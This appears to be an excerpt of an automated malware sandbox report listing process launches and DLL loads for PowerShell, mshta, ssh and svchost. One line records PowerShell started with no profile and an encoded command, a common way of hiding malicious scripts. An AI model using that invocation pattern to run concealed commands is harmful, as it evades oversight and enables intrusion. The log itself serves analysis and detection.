        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc 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
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: libcrypto.dll
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: napinsp.dll
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: pnrpnsp.dll
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: wshbth.dll
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: nlaapi.dll
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: mswsock.dll
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: winrnr.dll
        Source: C:\Windows\System32\OpenSSH\ssh.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: zipfldr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
